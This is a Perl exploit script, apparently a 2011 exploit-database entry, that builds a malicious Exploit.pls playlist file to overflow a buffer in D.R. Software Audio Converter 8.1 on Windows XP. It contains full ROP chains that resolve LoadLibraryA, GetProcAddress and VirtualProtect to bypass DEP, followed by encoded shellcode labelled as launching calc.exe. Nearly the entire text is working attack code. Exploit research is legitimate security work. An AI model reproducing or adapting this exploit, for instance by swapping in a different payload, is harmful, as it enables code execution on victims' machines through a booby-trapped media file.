|
#!/usr/bin/perl # #[+]Exploit Title: D.R. Software Audio Converter 8.1 DEP Bypass Exploit #[+]Date: 13\08\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html #[+]Found By: Sud0 from Corelan Team(http://www.exploit-db.com/exploits/13760/) or also created KedAns-Dz(http://1337day.com/exploits/16248) #[+]Version: 8.1 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A #
print q{
Created By C4SS!0 G0M3S E-mail louredo_@hotmail.com Site net-fuzzer.blogspot.com }; print "\n\t\t[+]Creating Exploit File...\n"; sleep(2); #####################################ROP FOR LoadLibraryA############################## my $rop = pack('V',0x00430076); # POP ECX # RETN $rop .= pack('V',0x0044B274); # Endereco de LoadLibraryA $rop .= pack('V',0x1003d56e); # POP ESI # RETN $rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to LoadLibraryA $rop .= pack('V',0x10068022); # POP EBP # RETN $rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04 $rop .= pack('V',0x0040aaf2); # POP EDI # RETN $rop .= pack('V',0x1002ef15); #RETN $rop .= pack('V',0x1002ef14); # PUSHAD # RETN $rop .= "kernel32.dll\x00"; $rop .= "A" x 11; #####################################ROP END HERE#######################################
#####################################ROP FOR GetProcAddress############################# $rop .= pack('V',0x1002ef15) x 3; #RETN $rop .= pack('V',0x00430076); # POP ECX # RETN $rop .= pack('V',0x0044B1E8); # Endereco de GetProcAddress $rop .= pack('V',0x0040aaf2); # POP EDI # RETN $rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to GetProcAddress $rop .= pack('V',0x1006809f); # POP ESI # RETN $rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04 $rop .= pack('V',0x00447b7d); # XCHG EAX,EBP # RETN $rop .= pack('V',0x1002ef14); # PUSHAD # RETN $rop .= "VirtualProtect\x00"; $rop .= "D" x 9; # Junk #####################################ROP END HERE#######################################
################################ROP FOR VirtualProtect################################## $rop .= pack('V',0x1002ef15) x 4; #RETN $rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN $rop .= pack('V',0x100753c0); # PUSH ESP # POP EBP # POP EBX # ADD ESP,10 # RETN $rop .= "A" x 20; # Junk $rop .= pack('V',0x10015a15); # XCHG EAX,EBP # RETN $rop .= pack('V',0x1004108e) x 20; # ADD EAX,0A # RETN $rop .= pack('V',0x1007275D); # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 $rop .= "A" x 4; $rop .= pack('V',0x1002ef15) x 5; #RETN $rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN $rop .= pack('V',0x10068022); # POP EBP # RETN $rop .= pack('V',0x0040A8F4); # CALL ESP // Endereço de retorno da funçao $rop .= pack('V',0x100080ea); # POP EBX # RETN $rop .= pack('V',0x00001000); # Valor de dwSize $rop .= pack('V',0x10082cde); # POP EDX # RETN $rop .= pack('V',0x00000040); # Valor de flNewProtect $rop .= pack('V',0x1007076e); # POP EDI # RETN $rop .= pack('V',0x1002ef15); # RETN $rop .= pack('V',0x1002ef14); # PUSHAD # RETN $rop .= "\x90" x 25; # Some nops $rop .= "\xeb\x10"; # Little jmp to fix shellcode. :) $rop .= "\x90" x 20; # More nops ####################################ROP END HERE#####################################
my $shellcode = "\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" . "\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" . "\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" . "\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" . "\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" . "\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" . "\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" . "\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe" "\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff" "\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" . "\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" . "\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" . "\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" . "\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" . "\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" . "\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81";
my $buf = "A" x 180; $buf .= pack('V',0x1001bc95); # ADD ESP,1010 # RETN 04 $buf .= "A" x 4112; $buf .= pack('V',0x10071916) x 2; # RETN $buf .= pack('V',0x10071910); # ADD ESP,100 # RETN $buf .= "C" x (4436-length($buf)); $buf .= pack('V',0x10029cfd); # ADD ESP,814 # RETN $buf .= "A" x 124; $buf .= $rop; $buf .= $shellcode; $buf .= "D" x (30000-length($buf));
open(f,">Exploit.pls") or die "[*]Error: $!\n"; print f $buf; close f; print "\t\t[+]File Exploit.pls Created successfully.\n"; sleep(1);
|